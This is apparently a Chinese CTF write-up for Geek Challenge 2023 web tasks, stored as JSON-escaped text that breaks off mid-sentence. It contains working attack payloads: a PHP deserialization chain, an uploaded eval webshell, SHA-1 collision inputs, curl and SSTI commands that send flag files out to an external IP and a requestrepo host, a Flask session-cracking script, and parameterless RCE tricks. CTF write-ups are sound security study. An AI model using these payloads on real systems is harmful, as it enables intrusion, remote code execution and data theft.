\u6765\u7b7e\u4e2a\u5230\u5427\u5148<\/p>\n\n\n\n
<?php
highlight_file(__FILE__);
class syc
{
public $cuit;
public function __destruct()
{
echo(\"action!<br>\");
$function=$this->cuit;
return $function();
}
}
\u200b
class lover
{
public $yxx;
public $QW;
public function __invoke()
{
echo(\"invoke!<br>\");
return $this->yxx->QW;
}
\u200b
}
\u200b
class web
{
public $eva1;
public $interesting;
\u200b
public function __get($var)
{
echo(\"get!<br>\");
$eva1=$this->eva1;
$eva1($this->interesting);
}
}
if (isset($_POST['url']))
{
unserialize($_POST['url']);
}
\u200b
?><\/pre>\n\n\n\n\u94fe\u5b50\uff1asyc-dest->>$function() -> lover-__invoke()->>$this->yxx->QW -> web->get->>eval<\/pre>\n\n\n\nexp\uff1a
<?php
\u200b
class syc
{
public $cuit;
\u200b
}
\u200b
class lover
{
public $yxx;
public $QW;
\u200b
}
\u200b
class web
{
public $eva1;
public $interesting;
}
\u200b
$a = new syc();
$b = new lover();
$c = new web();
$a -> cuit = $b;
$b -> yxx = $c;
$c -> eva1 = \"system\";
$c -> interesting = \"tac \/f*\";
echo serialize($a);
\/\/O:3:\"syc\":1:{s:4:\"cuit\";O:5:\"lover\":2:{s:3:\"yxx\";O:3:\"web\":2:{s:4:\"eva1\";s:6:\"system\";s:11:\"interesting\";s:7:\"tac \/f*\";}s:2:\"QW\";N;}}<\/pre>\n\n\n\n\u6781\u5ba2\u5927\u6311\u62182023-web-n00b_Upload<\/h2>\n\n\n\n
{“type”:”doc”,”content”:[{“type”:”heading”,”attrs”:{“level”:4},”content”:[{“type”:”text”,”text”:””\u624e\u53e4\uff0c\u624e\u53e4\u2764\u201c”}]}]}<\/p>\n\n\n\n
Content-Disposition: form-data; name=\"file\"; filename=\"1.php\"
Content-Type: image\/png
\u200b
<?= @eval($_POST[1]);?>
------WebKitFormBoundary23rRUoypB08Lidcr
Content-Disposition: form-data; name=\"submit\"
\u200b
\u63d0\u4ea4<\/pre>\n\n\n\n\u7136\u540e\u8bbf\u95ee1.php\u8fdb\u884crce\u5c31\u884c<\/p>\n\n\n\n
\u6781\u5ba2\u5927\u6311\u62182023-web-easy_php<\/h2>\n\n\n\n
\u5b66\u4e86php\u4e86\uff0c\u90a3\u5c31\u6765\u770b\u770b\u8fd9\u4e9b\u7ed5\u8fc7\u5427<\/p>\n\n\n\n
<?php
header('Content-type:text\/html;charset=utf-8');
error_reporting(0);
\u200b
highlight_file(__FILE__);
include_once('flag.php');
if(isset($_GET['syc'])&&preg_match('\/^Welcome to GEEK 2023!$\/i', $_GET['syc']) && $_GET['syc'] !== 'Welcome to GEEK 2023!') {
if (intval($_GET['lover']) < 2023 && intval($_GET['lover'] + 1) > 2024) {
if (isset($_POST['qw']) && $_POST['yxx']) {
$array1 = (string)$_POST['qw'];
$array2 = (string)$_POST['yxx'];
if (sha1($array1) === sha1($array2)) {
if (isset($_POST['SYC_GEEK.2023'])&&($_POST['SYC_GEEK.2023']=\"Happy to see you!\")) {
echo $flag;
} else {
echo \"\u518d\u7ed5\u6700\u540e\u4e00\u6b65\u5427\";
}
} else {
echo \"\u597d\u54e9\uff0c\u5feb\u62ff\u5230flag\u5566\";
}
} else {
echo \"\u8fd9\u91cc\u7ed5\u4e0d\u8fc7\u53bb\uff0cQW\u53ef\u4e0d\u7b54\u5e94\u4e86\u54c8\";
}
} else {
echo \"\u563f\u563f\u563f\uff0c\u4f60\u522b\u6025\u554a\";
}
}else {
echo \"\u4e0d\u4f1a\u5427\u4e0d\u4f1a\u5427\uff0c\u4e0d\u4f1a\u7b2c\u4e00\u6b65\u5c31\u5361\u4f4f\u4e86\u5427\uff0cyxx\u4f1a\u77a7\u4e0d\u8d77\u4f60\u7684\uff01\";
}
?>
\u200b
\u4e0d\u4f1a\u5427\u4e0d\u4f1a\u5427\uff0c\u4e0d\u4f1a\u7b2c\u4e00\u6b65\u5c31\u5361\u4f4f\u4e86\u5427\uff0cyxx\u4f1a\u77a7\u4e0d\u8d77\u4f60\u7684\uff01<\/pre>\n\n\n\n\u7b2c\u4e00\u6b65\uff1asyc=welcome%20to%20GEEK%202023!&lover=1e9
POST:
\u200b
SYC[GEEK.2023=1&SYC[GEEK.2023=Happy to see you!&qw=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C\/Width%202%200%20R\/Height%203%200%20R\/Type%204%200%20R\/Subtype%205%200%20R\/Filter%206%200%20R\/ColorSpace%207%200%20R\/Length%208%200%20R\/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85\/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr\/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&yxx=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C\/Width%202%200%20R\/Height%203%200%20R\/Type%204%200%20R\/Subtype%205%200%20R\/Filter%206%200%20R\/ColorSpace%207%200%20R\/Length%208%200%20R\/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85\/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2\/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1
\u200b<\/pre>\n\n\n\nctf_curl<\/h2>\n\n\n\n
\u9898\u76ee\u63cf\u8ff0\uff1a\u547d\u4ee4\u6267\u884c\uff1f\u771f\u7684\u5417\uff1f<\/p>\n\n\n\n
<?php
highlight_file('index.php');
\/\/ curl your domain
\/\/ flag is in \/tmp\/Syclover
\u200b
if (isset($_GET['addr'])) {
$address = $_GET['addr'];
if(!preg_match(\"\/;|f|:|\\||\\&|!|>|<|`|\\(|{|\\?|\\n|\\r\/i\", $address)){
$result = system(\"curl \".$address.\"> \/dev\/null\");
} else {
echo \"Hacker!!!\";
}
}
?>
\u200b<\/pre>\n\n\n\n\u53ef\u4ee5\u4f7f\u7528\u65e0\u56de\u663eRCE\u4e2d\u7684http \u4fe1\u9053<\/strong>\u5e26\u51fa\u6587\u4ef6\u5185\u5bb9<\/p>\n\n\n\n
?addr=xxxxxx.requestrepo.com -T \/tmp\/Syclover\uff0c\u76f4\u63a5\u5e26\u51fa\u6765\/tmp\/Syclover<\/p>\n\n\n\n
\u6781\u5ba2\u5927\u6311\u62182023-web-flag\u4fdd\u536b\u6218<\/h2>\n\n\n\n
jwt\u7684\u4e4b\u540e\u5728\u5199<\/p>\n\n\n\n
\u6781\u5ba2\u5927\u6311\u62182023-web-klf_ssti<\/h2>\n\n\n\n
De1ty\u7684\u5e7f\u4e1c\u670b\u53cb\u8ddf\u5973\u795e\u8868\u767d\u88ab\u9a82klf\uff0c\u73b0\u5728\u6c14\u6025\u8d25\u574f\uff0c\u4f60\u77e5\u9053klf\u662f\u4ec0\u4e48\u610f\u601d\u561b\uff1f\u4ed6\u73b0\u5728\u4f9d\u65e7\u89c9\u5f97\u4ed6\u4e0d\u662fklf\u4f60\u4eec\u624d\u662f\uff0c\u4f60\u80fd\u62ff\u5230flag\u8bc1\u660e\u4ed6\u662fklf\u561b\u2026<\/p>\n\n\n\n
f12\u51fa\u6765<\/p>\n\n\n\n
<!– \u6211\u597d\u50cf\u85cf\u4e86\u4e1c\u897f\u4f60\u627e\u5f97\u5230\u561bklf–><\/p>\n\n\n\n
dirsearch\u626b\u4e00\u4e0b\u51fa\u6765<\/p>\n\n\n\n
\/hack?klf= ssti\u7684<\/pre>\n\n\n\n\u7ecf\u8fc7\u6d4b\u8bd5\u53d1\u73b0\u4ec0\u4e48\u7684\u6ca1\u6709\u56de\u663e\uff0c\u96be\u53d7\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u76f4\u63a5\u53cd\u5f39shell<\/p>\n\n\n\n
\/hack?klf={{config.__class__.__init__.__globals__['os'].popen('curl \u4e0d\u7ed9\u4f60\u4eec\u770b').read()}}<\/pre>\n\n\n\nUser-Agent: curl\/7.74.0
Accept: *\/* \u786e\u5b9e\u6709\u56de\u663e\uff0c\u53cd\u5f39shell\u76f4\u63a5\u6253
\/hack?klf={{config.__class__.__init__.__globals__['os'].popen('curl \u4e0d\u7ed9\u4e0d\u7ed9\/`ls \/app\/f*`').read()}}<\/pre>\n\n\n\n\u56de\u663e
GET \/\/app\/fl4gfl4gfl4g HTTP\/1.1<\/pre>\n\n\n\n\/hack?klf={{config.__class__.__init__.__globals__['os'].popen('curl 101.201.119.158:2333\/`tac \/app\/fl4gfl4gfl4g`').read()}}
GET \/GEEKa6683312-eb8e-4afe-9be2-68f9a43ea11a HTTP\/1.1<\/pre>\n\n\n\n\u6781\u5ba2\u5927\u6311\u62182023-web-ez_remove<\/h2>\n\n\n\n
\u6211\u60f3\u8981\u56de\u7089\u91cd\u9020\u4e00\u6ce2\uff0c\u600e\u4e48\u8bf4\uff0c\u96be\u9053\u4f60\u4e0d\u60f3\u5417<\/p>\n\n\n\n
<?php
highlight_file(__FILE__);
class syc{
public $lover;
public function __destruct()
{
eval($this->lover);
}
}
\u200b
if(isset($_GET['web'])){
if(!preg_match('\/lover\/i',$_GET['web'])){
$a=unserialize($_GET['web']);
throw new Error(\"\u5feb\u6765\u73a9\u5feb\u6765\u73a9~\");
}
else{
echo(\"nonono\");
}
}
?><\/pre>\n\n\n\n\u8fd9\u91cc\u5229\u7528\u5341\u516d\u8fdb\u5236\u548cGC\u7ed5\u8fc7\u9650\u5236\u3002
https:\/\/link.csdn.net\/?from_id=134675568&target=https%3A%2F%2Fy4tacker.gitee.io%2F2021%2F02%2F03%2Fyear%2F2021%2F2%25E6%259C%2588%2Fphp%25E5%258F%258D%25E5%25BA%258F%25E5%2588%2597%25E5%258C%2596%2F
https:\/\/blog.csdn.net\/Jayjay___\/article\/details\/132463913
O:3:\"syc\":1:{s:5:\"lover\";s:10:\"phpinfo();\";}
->
O:3:\"syc\":1:{S:5:\"lo\\76er\";s:10:\"phpinfo();\";\u3010\u8bb0\u5f97url\u7f16\u7801\u3011<\/pre>\n\n\n\nGET:?web=O:3:\"syc\":1:{S:5:\"lo\\76er\";s:18:\"assert($_POST[1]);\";
\u200b
POST:1=\u8981\u6267\u884c\u7684\u4ee3\u7801
\u53ef\u4ee5\u8681\u5251\u8fde\u63a5
http:\/\/80-482363ca-eeec-47e9-a9ab-143ed67daebc.challenge.ctfplus.cn\/?web=O%3A3%3A%22syc%22%3A1%3A%7BS%3A5%3A%22lo%5C76er%22%3Bs%3A18%3A%22assert(%24_POST%5B1%5D)%3B%22%3B
\u8bb0\u5f97\u7f16\u7801 \u7136\u540e\u9009\u62e9base64<\/pre>\n\n\n\n\u6781\u5ba2\u5927\u6311\u62182023-web-ez_path<\/h2>\n\n\n\n
\u63d0\u793a<\/p>\n\n\n\n
import os, uuid
from flask import Flask, render_template, request, redirect
\u200b
app = Flask(__name__)
ARTICLES_FOLDER = 'articles\/'
articles = []
\u200b
\u200b
class Article:
def __init__(self, article_id, title, content):
self.article_id = article_id
self.title = title
self.content = content
\u200b
\u200b
def generate_article_id():
return str(uuid.uuid4())
\u200b
\u200b
@app.route('\/')
def index():
return render_template('index.html', articles=articles)
\u200b
@app.route('\/upload', methods=['GET', 'POST'])
def upload():
if request.method == 'POST':
title = request.form['title']
content = request.form['content']
article_id = generate_article_id()
article = Article(article_id, title, content)
articles.append(article)
save_article(article_id, title, content)
return redirect('\/')
else:
return render_template('upload.html')
\u200b
\u200b
@app.route('\/article\/<article_id>')
def article(article_id):
for article in articles:
if article.article_id == article_id:
title = article.title
sanitized_title = sanitize_filename(title)
article_path = os.path.join(ARTICLES_FOLDER, sanitized_title)
with open(article_path, 'r') as (file):
content = file.read()
return render_template('articles.html', title=sanitized_title, content=content, article_path=article_path)
return render_template('error.html') # \u5982\u679c\u627e\u4e0d\u5230\u5bf9\u5e94\u7684\u6587\u7ae0\uff0c\u5219\u8fd4\u56de\u9519\u8bef\u9875\u9762
\u200b
def save_article(article_id, title, content):
sanitized_title = sanitize_filename(title)
article_path = ARTICLES_FOLDER + '\/' + sanitized_title
with open(article_path, 'w') as (file):
file.write(content)
\u200b
\u200b
\u200b
\u200b
def sanitize_filename(filename): #\u8fc7\u6ee4\u51fd\u6570\uff0c\u88ab\u8fc7\u6ee4\u7684\u5b57\u7b26\u90fd\u66ff\u6362\u6210\u4e0b\u5212\u7ebf
sensitive_chars = [
':',
'*',
'?',
'\"',
'<',
'>',
'|',
'.']
for char in sensitive_chars:
filename = filename.replace(char, '_')
return filename
\u200b
\u200b
if __name__ == '__main__':
app.run(debug=True)
\u200b<\/pre>\n\n\n\n\u53d1\u73b0\u8fd9\u4e2a\u5b58\u5728Python \u4e2d\u7684\u8def\u5f84\u7a7f\u8d8a\u5728upload\u8fd9\u4e2a\u63a5\u53e3<\/p>\n\n\n\n
def upload():
if request.method == 'POST':
title = request.form['title']
content = request.form['content']
article_id = generate_article_id()
article = Article(article_id, title, content)
articles.append(article)
save_article(article_id, title, content)
return redirect('\/')
else:
return render_template('upload.html')<\/pre>\n\n\n\n# os.path.join
>>> os.path.join('\/home\/download', '..\/..\/opt\/logo.png')
\/home\/download\/..\/..\/opt\/logo.png
\u200b
# pathlib
>>> pathlib.Path('\/home\/download') \/ '..\/..\/opt\/logo.png'
\/home\/download\/..\/..\/opt\/logo.png
\u200b
\u3010\u5982\u679c\u67d0\u4e2a\u90e8\u5206\u4e3a\u7edd\u5bf9\u8def\u5f84\uff0c\u5219\u4e4b\u524d\u7684\u6240\u6709\u90e8\u5206\u90fd\u4f1a\u88ab\u4e22\u5f03\u5e76\u4ece\u7edd\u5bf9\u8def\u5f84\u5f00\u59cb\u7ee7\u7eed\u62fc\u63a5\u3011
\u200b
# os.path.join
>>> os.path.join('\/home\/download', '\/opt\/logo.png')
\/opt\/logo.png
\u200b
# pathlib
>>> pathlib.Path('\/home\/download') \/ '\/opt\/logo.png'
\/opt\/logo.png
# os.path.join
>>> os.path.join('\/home\/download', '..\/..\/opt\/logo.png')
\/home\/download\/..\/..\/opt\/logo.png
\u200b
# pathlib
>>> pathlib.Path('\/home\/download') \/ '..\/..\/opt\/logo.png'
\/home\/download\/..\/..\/opt\/logo.png
\u200b
\u3010\u5982\u679c\u67d0\u4e2a\u90e8\u5206\u4e3a\u7edd\u5bf9\u8def\u5f84\uff0c\u5219\u4e4b\u524d\u7684\u6240\u6709\u90e8\u5206\u90fd\u4f1a\u88ab\u4e22\u5f03\u5e76\u4ece\u7edd\u5bf9\u8def\u5f84\u5f00\u59cb\u7ee7\u7eed\u62fc\u63a5\u3011
\u200b
# os.path.join
>>> os.path.join('\/home\/download', '\/opt\/logo.png')
\/opt\/logo.png
\u200b
# pathlib
>>> pathlib.Path('\/home\/download') \/ '\/opt\/logo.png'
\/opt\/logo.png
https:\/\/blog.csdn.net\/qq_36078992\/article\/details\/122070641<\/pre>\n\n\n\n\u6709\u8def\u5f84\u62fc\u63a5\uff0c\u731c\u6d4b\/home\u8def\u7531\u4e5f\u662f\u8def\u5f84\u62fc\u63a5\uff0c\u7528\u5230\u4e86os.path.join()\u6216\u8005pathlib.Path()\u65b9\u6cd5\uff0c\u6240\u4ee5\u9020\u6210\u4e86\u4e0a\u8ff0python\u8def\u5f84\u7a7f\u8d8a\u6f0f\u6d1e\u3002<\/pre>\n\n\n\n\u76f4\u63a5\u6dfb\u52a0\/f14444\u5c31\u6b27\u514b\u4e86<\/p>\n\n\n\n
you konw flask?<\/h2>\n\n\n\n
jwt\u5bc6\u94a5\u7684<\/p>\n\n\n\n
\u7206\u7834\u5bc6\u94a5\u811a\u672c<\/p>\n\n\n\n
import itertools
import flask_unsign
from flask_unsign.helpers import wordlist
import requests as r
import time
import re
import sys
\u200b
path = \"wordlist.txt\"
\u200b
print(\"Generating wordlist... \")
\u200b
with open(path,\"w\") as f:
#permutations with repetition
[f.write('wanbao'+\"\".join(x)+'=wanbao'+\"\\n\") for x in itertools.product('0123456789abcdefghijklmnopqrstuvwxyzQWERTYUIOPLKJHGFDSAZXCVBNM', repeat=3)] #\u52a0\u4e0a\u524d\u7f00
\u200b
#url = \"http:\/\/47.115.201.35:8000\/index\"
#cookie_tamper = r.head(url).cookies.get_dict()['session']
cookie_tamper='eyJpc19hZG1pbiI6ZmFsc2UsIm5hbWUiOiIxMSIsInVzZXJfaWQiOjJ9.ZUOXIQ.PPWPtlyo0NR_mm1V_pdrQOLy240'
print(\"Got cookie: \" + cookie_tamper)
\u200b
print(\"Cracker Started...\")
\u200b
obj = flask_unsign.Cracker(value=cookie_tamper)
\u200b
before = time.time()
\u200b
with wordlist(path, parse_lines=False) as iterator:
obj.crack(iterator)
\u200b
secret = \"\"
if obj.secret:
secret =obj.secret.decode()
print(f\"Found SECRET_KET {secret} in {time.time()-before} seconds\")
\u200b
signer = flask_unsign.sign({\"time\":time.time(),\"authorized\":True},secret=secret)
\u200b<\/pre>\n\n\n\n\u5de5\u5177\uff1a
\u200b
\u89e3\u5bc6session\uff1aflask-unsign --decode --cookie '\u83b7\u5f97\u7684session'
\u200b
\u7206\u7834\u5bc6\u94a5\uff1aflask-unsign --unsign --cookie '\u83b7\u5f97\u7684session'
\u200b
\u52a0\u5bc6session\uff1aflask-unsign --sign --cookie \"{'logged_in': True}\" --secret 'CHANGEME'
\u200b
\u7206\u7834\u6307\u5b9a\u5b57\u5178\uff1aflask-unsign --unsign --cookie 'xxx --wordlist key.txt
\u200b<\/pre>\n\n\n\n\u901a\u8fc7\u4f2a\u9020\u83b7\u5f97flag<\/p>\n\n\n\n
Pupyy_rce<\/h2>\n\n\n\n
<?php
highlight_file(__FILE__);
header('Content-Type: text\/html; charset=utf-8');
error_reporting(0);
include(flag.php);
\/\/\u5f53\u524d\u76ee\u5f55\u4e0b\u6709\u597d\u5eb7\u7684\ud83d\ude0b
if (isset($_GET['var']) && $_GET['var']) {
$var = $_GET['var'];
if (!preg_match(\"\/env|var|session|header\/i\", $var,$match)) {
if (';' === preg_replace('\/[^\\s\\(\\)]+?\\((?R)?\\)\/', '', $var)){
eval($_GET['var']);
}
else die(\"WAF!!\");
} else{
die(\"PLZ DONT HCAK ME\ud83d\ude05\");
}
}<\/pre>\n\n\n\n\u65e0\u53c2\u6570RCE<\/strong><\/h3>\n\n\n\n
\u5148<\/p>\n\n\n\n
?var=print_r(scandir(getcwd()))%3B<\/pre>\n\n\n\nArray ( [0] => . [1] => .. [2] => error.log [3] => fl@g.php [4] => genshin01.txt [5] => index.php [6] => tiangou01.txt [7] => tiangou02.txt )<\/pre>\n\n\n\n\u524d\u7f6e\u57fa\u7840\uff1a
array_rand(): \u4ece\u6570\u7ec4\u4e2d\u53d6\u51fa\u4e00\u4e2a\u6216\u8005\u591a\u4e2a\u5355\u5143\uff0c\u5e76\u4e14\u8fd4\u56de\u968f\u673a\u6761\u76ee\u7684\u4e00\u4e2a\u6216\u8005\u591a\u4e2a\u952e\u3002
array_flip()\uff1a\u8bfb\u53d6\u5f53\u524d\u76ee\u5f55\u7684\u952e\u548c\u503c\u8fdb\u884c\u4ea4\u6362\uff0c\u5982\u679c\u5931\u8d25\u8fd4\u56de NULL\u3002
array_flip()\u548carray_rand()\u914d\u5408\u4f7f\u7528\u53ef\u968f\u673a\u8fd4\u56de\u5f53\u524d\u76ee\u5f55\u4e0b\u7684\u6587\u4ef6\u540d\u3002\u56e0\u4e3a\u5176\u4e2d\u7684\u952e\u53ef\u4ee5\u5229\u7528\u968f\u673a\u6570\u51fd\u6570array_rand()\uff0c\u8fdb\u884c\u968f\u673a\u751f\u6210\u3002<\/pre>\n\n\n\n?var=show_source(array_rand(array_flip(scandir(getcwd())))); \u968f\u673a\u7206\u67e5\u770b\u91cc\u9762\u7684\u6587\u4ef6<\/pre>\n\n\n\n\u665a\u4e0a\u88ab\u8fd9\u4e2a\u65e0\u53c2\u6570rce\u70e6\u6b7b\u4e86\uff0c\u6b63\u597d\u8fc7\u6765\u603b\u7ed3\u4e00\u4e0b<\/p>\n\n\n\n
<?php
highlight_file(__FILE__);
$A = isset($_GET['pds2025']) ? $_GET['pds2025'] : null;
if ($A) {
eval($A);
}
\u4f8b\u9898<\/pre>\n\n\n\n\u5229\u7528\u8fd9\u4e2a<\/p>\n\n\n\n
?pds2025=print_r(scandir('.'))%3B
Array ( [0] => . [1] => .. [2] => index.php )
?pds2025=var_dump(scandir('.'))%3Barray(3) { [0]=> string(1) \".\" [1]=> string(2) \"..\" [2]=> string(9) \"index.php\" }
array(3) {
[0]=> string(1) \".\" \/\/ \u5f53\u524d\u76ee\u5f55
[1]=> string(2) \"..\" \/\/ \u4e0a\u7ea7\u76ee\u5f55
[2]=> string(9) \"index.php\" \/\/ \u5f53\u524d\u6587\u4ef6
}
?pds2025=print_r(scandir('\/'))%3B \u6839\u76ee\u5f55\u4e0b\u9762\u53d1\u73b0\u6709flag
\u76f4\u63a5readfile('\/flag')%3B
\u6b63\u5e38\u786e\u5b9e\u662f\u8fd9\u6837\u8bfb\u7684\u90a3\u5229\u7528\u5176\u4ed6\u7684\u5185\u7f6e\u51fd\u6570\u5462\ud83e\udd14\ud83e\udd14\ud83e\udd14<\/pre>\n\n\n\n\u51fd\u6570
scandir() :\u5c06\u8fd4\u56de\u5f53\u524d\u76ee\u5f55\u4e2d\u7684\u6240\u6709\u6587\u4ef6\u548c\u76ee\u5f55\u7684\u5217\u8868\u3002\u8fd4\u56de\u7684\u7ed3\u679c\u662f\u4e00\u4e2a\u6570\u7ec4\uff0c\u5176\u4e2d\u5305\u542b\u5f53\u524d\u76ee\u5f55\u4e0b\u7684\u6240\u6709\u6587\u4ef6\u548c\u76ee\u5f55\u540d\u79f0\uff08glob()\u53ef\u66ff\u6362\uff09
localeconv() \uff1a\u8fd4\u56de\u4e00\u5305\u542b\u672c\u5730\u6570\u5b57\u53ca\u8d27\u5e01\u683c\u5f0f\u4fe1\u606f\u7684\u6570\u7ec4\u3002\uff08\u4f46\u662f\u8fd9\u91cc\u6570\u7ec4\u7b2c\u4e00\u9879\u5c31\u662f\u2018.\u2019\uff0c\u8fd9\u4e2a.\u7684\u7528\u5904\u5f88\u5927\uff09
current() \uff1a\u8fd4\u56de\u6570\u7ec4\u4e2d\u7684\u5355\u5143\uff0c\u9ed8\u8ba4\u53d6\u7b2c\u4e00\u4e2a\u503c\u3002pos()\u548ccurrent()\u662f\u540c\u4e00\u4e2a\u4e1c\u897f
getcwd() :\u53d6\u5f97\u5f53\u524d\u5de5\u4f5c\u76ee\u5f55
dirname():\u51fd\u6570\u8fd4\u56de\u8def\u5f84\u4e2d\u7684\u76ee\u5f55\u90e8\u5206
array_flip() :\u4ea4\u6362\u6570\u7ec4\u4e2d\u7684\u952e\u548c\u503c\uff0c\u6210\u529f\u65f6\u8fd4\u56de\u4ea4\u6362\u540e\u7684\u6570\u7ec4
array_rand() :\u4ece\u6570\u7ec4\u4e2d\u968f\u673a\u53d6\u51fa\u4e00\u4e2a\u6216\u591a\u4e2a\u5355\u5143
\u200b
array_reverse():\u5c06\u6570\u7ec4\u5185\u5bb9\u53cd\u8f6c
\u200b
strrev():\u7528\u4e8e\u53cd\u8f6c\u7ed9\u5b9a\u5b57\u7b26\u4e32
\u200b
getcwd()\uff1a\u83b7\u53d6\u5f53\u524d\u5de5\u4f5c\u76ee\u5f55\u8def\u5f84
\u200b
dirname() \uff1a\u51fd\u6570\u8fd4\u56de\u8def\u5f84\u4e2d\u7684\u76ee\u5f55\u90e8\u5206\u3002
chdir() \uff1a\u51fd\u6570\u6539\u53d8\u5f53\u524d\u7684\u76ee\u5f55\u3002
\u200b
eval()\u3001assert()\uff1a\u547d\u4ee4\u6267\u884c
\u200b
hightlight_file()\u3001show_source()\u3001readfile()\uff1a\u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9
end() \uff1a \u5c06\u5185\u90e8\u6307\u9488\u6307\u5411\u6570\u7ec4\u4e2d\u7684\u6700\u540e\u4e00\u4e2a\u5143\u7d20\uff0c\u5e76\u8f93\u51fa
next() \uff1a\u5c06\u5185\u90e8\u6307\u9488\u6307\u5411\u6570\u7ec4\u4e2d\u7684\u4e0b\u4e00\u4e2a\u5143\u7d20\uff0c\u5e76\u8f93\u51fa
prev() \uff1a\u5c06\u5185\u90e8\u6307\u9488\u6307\u5411\u6570\u7ec4\u4e2d\u7684\u4e0a\u4e00\u4e2a\u5143\u7d20\uff0c\u5e76\u8f93\u51fa
reset() \uff1a \u5c06\u5185\u90e8\u6307\u9488\u6307\u5411\u6570\u7ec4\u4e2d\u7684\u7b2c\u4e00\u4e2a\u5143\u7d20\uff0c\u5e76\u8f93\u51fa
each() \uff1a \u8fd4\u56de\u5f53\u524d\u5143\u7d20\u7684\u952e\u540d\u548c\u952e\u503c\uff0c\u5e76\u5c06\u5185\u90e8\u6307\u9488\u5411\u524d\u79fb\u52a8<\/pre>\n\n\n\n\u4ee3\u7801<\/h4>\n\n\n\n
if(';' === preg_replace('\/[^\\W]+\\((?R)?\\)\/', '', $_GET['star'])) {
eval($_GET['star']);
}<\/pre>\n\n\n\n\u6b63\u5219\u8868\u8fbe\u5f0f \\W<\/sup>+((?R)?) \u5339\u914d\u4e86\u4e00\u4e2a\u6216\u591a\u4e2a\u975e\u6807\u70b9\u7b26\u53f7\u5b57\u7b26\uff08\u8868\u793a\u51fd\u6570\u540d\uff09\uff0c\u540e\u8ddf\u4e00\u4e2a\u62ec\u53f7\uff08\u8868\u793a\u51fd\u6570\u8c03\u7528\uff09\u3002\u5176\u4e2d (?R) \u662f\u9012\u5f52\u5f15\u7528\uff0c\u5b83\u53ea\u80fd\u5339\u914d\u548c\u66ff\u6362\u5d4c\u5957\u7684\u51fd\u6570\u8c03\u7528\uff0c\u800c\u4e0d\u80fd\u5904\u7406\u51fd\u6570\u53c2\u6570\u3002\u4f7f\u7528\u8be5\u6b63\u5219\u8868\u8fbe\u5f0f\u8fdb\u884c\u66ff\u6362\u540e\uff0c\u6bcf\u4e2a\u51fd\u6570\u8c03\u7528\u90fd\u4f1a\u88ab\u5220\u9664\uff0c\u53ea\u5269\u4e0b\u4e00\u4e2a\u5206\u53f7 ;\uff0c\u800c\u6700\u7ec8\u7ed3\u679c\u5f3a\u7b49\u4e8e\uff1b\u65f6\uff0cpayload\u624d\u80fd\u8fdb\u884c\u4e0b\u4e00\u6b65\u3002\u7b80\u800c\u8a00\u4e4b\uff0c\u65e0\u53c2\u6570rce\u5c31\u662f\u4e0d\u4f7f\u7528\u53c2\u6570\uff0c\u800c\u53ea\u4f7f\u7528\u4e00\u4e2a\u4e2a\u51fd\u6570\u6700\u7ec8\u8fbe\u5230\u76ee\u7684<\/p>\n\n\n\n
\u53ef\u4ee5\u5229\u7528\u5168\u5c40\u53d8\u91cf\uff0c\u4e5f\u53ef\u4ee5\u4f7f\u7528\u4e0a\u9762\u51fd\u6570\u7684\u7ec4\u5408\u62f3<\/p>\n\n\n\n
PHP \u8d85\u7ea7\u5168\u5c40\u53d8\u91cf\u5217\u8868:
$GLOBALS
$_SERVER
$_REQUEST
$_POST
$_GET
$_FILES
$_ENV
$_COOKIE
$_SESSION<\/pre>\n\n\n\ngetenv<\/h5>\n\n\n\n
getenv(name)\u53ef\u4ee5\u5229\u7528\u6b64\u51fd\u6570\u83b7\u53d6\u4e00\u4e2a\u540d\u4e3aname\u73af\u5883\u53d8\u91cf\u7684\u503c
\u200b
?star=var_dump(getenv(phpinfo())); \u8fd4\u56dephpinfo()\ud83d\udc4c
\u4e0d\u8fc7\u4e0d\u80fdrce\ud83d\ude22<\/pre>\n\n\n\nget_defined_vars()<\/h5>\n\n\n\n
\u8fd4\u56de\u6240\u6709\u5df2\u5b9a\u4e49\u53d8\u91cf\u7684\u503c\uff0c\u6240\u7ec4\u6210\u7684\u6570\u7ec4<\/p>\n\n\n\n
\u8fd4\u56de\u6570\u7ec4\u987a\u5e8f\u4e3aGET->POST->COOKIE->FILES<\/p>\n\n\n\n
print_r(get_defined_vars());<\/pre>\n\n\n\n\u5982\u8bf4\u539f\u672c\u53ea\u6709\u4e00\u4e2a\u53c2\u6570a\uff0c\u90a3\u4e48\u53ef\u4ee5\u591a\u52a0\u4e00\u4e2a\u53c2\u6570b\uff0c\u540e\u9762\u5199\u5165\u6076\u610f\u8bed\u53e5\uff0cpayload\uff1a<\/p>\n\n\n\n
a=eval(end(current(get_defined_vars())));&b=phpinfo(); \u8f93\u51faphpinfo()\u547d\u4ee4<\/pre>\n\n\n\nsession_id<\/strong><\/h5>\n\n\n\n
\u4eceCookie\u4e0b\u624b<\/p>\n\n\n\n
\u9996\u5148\u6211\u4eec\u9700\u8981\u5f00\u542f
